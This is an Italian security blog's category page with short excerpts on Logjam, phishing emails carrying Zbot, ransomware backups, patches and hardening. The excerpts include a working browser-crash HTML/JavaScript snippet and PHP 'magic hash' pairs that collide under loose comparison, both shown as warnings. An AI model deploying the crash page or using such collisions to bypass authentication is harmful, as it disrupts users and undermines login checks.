SIAMO GEEK

Categoria: Sicurezza

Sicurezza informatica

  • TLS logjam

    Un gruppo di ricercatori ha pubblicato l’articolo Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice [PDF] spiegato in termini non accademici in un sito apposito.

    La pubblicazione illustra una vulnerabilità del protocollo TLS, utilizzato anche da HTTPS. Il metodo è molto simile a quello utilizzato per FREAK: un attacco di tipo MitM forza la connessione tra client e server ad un livello di sicurezza molto basso e, quindi, decodificabile. Il tutto grazie ad un retaggio della Guerra Fredda. (altro…)

  • Siamo in https

    Era ora!

    Finalmente quel fannullone di Luigi si è deciso a fare i cambiamenti strutturali del caso che hanno permesso al sito di passare in https senza problemi (forse).

    È attivo un redirect da http a https per non rompere i link, se ci sono problemi scrivete nei commenti di questo articolo, sulla pagina Facebook oppure via mail.

  • PHP: come non confrontare gli hash

    Provate ad eseguire questo codice:

    <?php var_dump(md5('240610708') == md5('QNKCDZO'));
    var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
    var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
    var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
    var_dump('0010e2' == '1e3');
    var_dump('0x1234Ab' == '1193131');
    var_dump('0xABCdef' == ' 0xABCdef');     (altro…)

  • Finte email per le fatture del telepass

    Ricevo oggi una finta email di avviso di emissione di una fattura del Telepass. La mail è del tutto identica a quella vera, l’unica differenza  è che in allegato vi è un malware (Zbot), mentre in quella vera non vi è alcun allegato, in quanto le fatture devono essere scaricate dal sito www.telepass.it.

    Il malware ad oggi viene riconosciuto da 16 antivirus su 56 (dice Virustotal), fra i quali Kaspersky e NOD32.

    Non viene riconosciuto da Microsoft, ne’ da nessuno dei vari antivirus gratuiti.

  • Backup anti-ransomware

    Siamo in un periodo in cui parte del malware è scritto con la finalità di bloccare i file di dati per poi chiedere un riscatto (ransomware).

    In questo momento il ransomware è diffuso in ambiente Windows, ma presumere di essere immuni solo per il fatto di non utilizzare Windows è da sprovveduti.

    Ci sono delle strategie di backup semplici da attuare che permettono di mettersi relativamente al sicuro in caso di attacchi di questo tipo ed evitare disastri. (altro…)

  • Ripeto: è sufficiente il backup

    attacco hackerReplica di una scena già vista: una Pubblica Amministrazione perde i dati per mancanza di diligenza e si urla all’attacco hacker.

    Non avendo personalmente analizzato la situazione posso solamente fare delle supposizioni. (altro…)

  • Aggiornate gli IIS esposti a Internet ADESSO

    Microsoft ha recentemente corretto un problema critico di HTTP.sys

    Come capita spesso, qualcuno ha analizzato le differenze per scoprire il tipo di problema che è stato corretto e i risultati delle analisi portano a suggerire di aggiornare immediatamente IIS, prima che dobbiate essere costretti a farlo da una serie di BSOD. (altro…)

  • Giocare la password ai dadi

    Assume that your adversary is capable of a trillion guesses per second.
    Edward Snowden a Laura Poitras, maggio 2013

    Cinque dadiCome difendersi da qualcuno con questa potenza di fuoco, che nel frattempo è sicuramente aumentata?

    Un modo efficace è rispolverare cinque cari vecchi dadi da gioco. (altro…)

  • Migliorare la sicurezza di CentOS 7

    Su High on Coffe c’è un articolo con una serie di consigli per migliorare la sicurezza di CentOS 7.

    Non si tratta della solita prolissa guida di RedHat, ma di una serie di controlli da effettuare su un’installazione se si vuole migliorare la sicurezza di una parte del sistema.

    Un altro vantaggio di questa guida è che si basa su un’installazione minimale di CentOS 7. (altro…)

  • Aggiornamenti OpenSSL

    OpenSSLSono appena state rilasciate le nuove versioni di OpenSSL 1.0.2a, 1.0.1m, 1.0.0r e 0.9.8.zf

    Gli aggiornamenti correggono bachi di severità alta (1.0.2a) o moderata (tutte le altre) delle versioni precedenti. (altro…)

  • Ammazzabrowser

    <!DOCTYPE html>
<html>
 <head>
 <script>
 location = 'data:text/html,<script>location = "location.toString + \"A\"";' + 'A'.repeat( 100000000 );
 </script>
 </head>
</html>

    Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso.

    Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com. (altro…)

  • Sito del PD Toscana hackerato

    La notizia non è che un WordPress sia stato sfondato, ma come.

    In questo momento il sito del PD Toscana mostra questa immagine di apertura:

    pd toscana hack

    Ad un’analisi superficiale potrebbe apparire che degli abilissimi hacker abbiano rubato le credenziali al webmaster. (altro…)